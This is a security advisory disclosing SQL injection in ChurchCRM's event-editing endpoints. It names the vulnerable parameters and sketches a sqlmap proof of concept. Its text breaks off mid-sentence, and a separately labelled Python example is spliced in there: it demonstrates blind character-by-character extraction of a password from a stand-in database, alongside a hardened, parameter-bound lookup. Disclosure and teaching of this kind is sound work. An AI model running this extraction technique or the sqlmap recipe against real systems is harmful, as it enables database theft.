SQL Injection Vulnerability in ChurchCRM (CVE-2021-41965)
The manufacturer describes the product as follows (see 1):
“An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”
The software comes with an abundance of features relevant to churches and to managing a congregation. Among other things, it allows users to:
- Conduct Fundraisers
- Manage Church Members
- Publish Events
- Manage Sunday Schools
The source code can be found on ChurchCRM’s GitHub account 2.
ChurchCRM is vulnerable to SQL injection because user-supplied input is not validated and no other protection mechanism is in place before that input reaches the database.
ChurchCRM lets its users schedule church events such as services, Sunday school or summer camps. Once an event has been created, it can also be edited or deleted again from the events page.
It was found that the EID parameter, which is sent along when an existing entry is edited, is susceptible to SQL injection. On edit, the data is posted to EventEditor.php, where it ends up in a query executed against the database. Likewise, the EN_tyid parameter sent with the same edit request and the theID parameter of the EventNames.php endpoint can be abused to inject arbitrary SQL.
Different types of SQL injection techniques can be applied, including:
- Boolean-based blind
- Time-based blind
The vulnerable functionality is only accessible when authenticated.
Proof of Concept (PoC)
As a proof of concept, the EN_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap 3.
Let’s start with the HTTP request I had captured in Burp Suite.
This request could then be passed to sqlmap for injecting the
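The boolean-based blind technique that sqlmap applies here, reconstructed as an added, self-contained Python example that is not part of the original advisory and not ChurchCRM's code. It simulates an EN_tyid-style lookup against an in-memory SQLite database (the schema, rows and the value `secret` are constructed for this example, not ChurchCRM's), shows how a true/false oracle built from the injectable parameter leaks a value one character at a time, and contrasts it with a lookup that validates the parameter and binds it. Time-based blind injection follows the same loop but replaces the "row present / row absent" difference with a database-side delay (for example MySQL's SLEEP()), which SQLite does not provide.

```python
import sqlite3


def build_db():
    """Constructed stand-in database: schema and rows are made up for this
    example and are not ChurchCRM's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events_event (event_id INTEGER PRIMARY KEY, "
                 "event_type INTEGER, title TEXT)")
    conn.execute("CREATE TABLE user_usr (usr_id INTEGER PRIMARY KEY, "
                 "usr_name TEXT, usr_password TEXT)")
    conn.executemany("INSERT INTO events_event VALUES (?, ?, ?)",
                     [(1, 1, "Sunday service"), (2, 2, "Summer camp")])
    conn.execute("INSERT INTO user_usr VALUES (1, 'admin', 'secret')")
    return conn


def vulnerable_lookup(conn, en_tyid):
    """Vulnerable pattern: the request parameter is concatenated straight into
    the SQL text. This is the shape of bug the advisory describes, written for
    SQLite here; it is not ChurchCRM's actual query."""
    sql = "SELECT title FROM events_event WHERE event_type = " + en_tyid
    return [row[0] for row in conn.execute(sql)]


def oracle(conn, condition):
    """Boolean-based blind oracle: append 'AND (<condition>)' to a known-good
    value (EN_tyid=1 AND (...) in the edit request). Whether the event row comes
    back tells the attacker whether the condition was true."""
    payload = "1 AND (" + condition + ")"
    return len(vulnerable_lookup(conn, payload)) > 0


def extract_blind(conn, subquery, max_len=64):
    """Leak the result of `subquery` one character at a time. A binary search
    over the code point (0..127) costs at most seven oracle queries per
    character instead of up to 128."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # Past the end of the string: substr() is empty, unicode() is NULL,
            # so every comparison is false and the search bottoms out at 0.
            break
        result += chr(lo)
    return result


def safe_lookup(conn, en_tyid):
    """Hardened form: validate the parameter as a numeric id, then bind it.
    Validation alone suffices for an integer id; binding is what separates
    code from data for any parameter type and is the general fix."""
    if not en_tyid.isdecimal():
        raise ValueError("EN_tyid must be a numeric id")
    return [row[0] for row in conn.execute(
        "SELECT title FROM events_event WHERE event_type = ?", (int(en_tyid),))]


if __name__ == "__main__":
    conn = build_db()
    leaked = extract_blind(
        conn, "SELECT usr_password FROM user_usr WHERE usr_name = 'admin'")
    print("leaked through the injectable parameter:", leaked)
    try:
        safe_lookup(conn, "1 AND 1=1")
    except ValueError as exc:
        print("hardened lookup rejected the payload:", exc)
```

Against the live application the same loop would send each payload as the EN_tyid value of the captured edit request and read the oracle from a difference in the HTTP response; sqlmap automates exactly this when the Burp request is passed in with `-r` and the parameter selected with `-p EN_tyid`, restricting it to blind techniques with `--technique=BT` (file name and host are assumptions). Note that every oracle query above goes through `vulnerable_lookup`; with `safe_lookup` in its place the payload never reaches the database at all.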
I immediately reached out to the vendor via email on 2021-09-16; they never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.
The overall timeline for disclosing this vulnerability was as follows:
- 2021-09-16: Vulnerability discovered
- 2021-09-16: Vulnerability reported to the manufacturer
- 2022-05-02: CVE has been reserved
- 2022-05-14: Public disclosure of the vulnerability
This security vulnerability was found by Alexander Bilz.
- E-Mail: mail[at]alexbilz.com
- Public Key: https://www.alexbilz.com/ABilz.asc
- Key ID: 0X474CECFD3DBC6880
- Key Fingerprint: 6C0E A8D0 C428 ED1D 8C2E C4A0 474C ECFD 3DBC 6880
The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.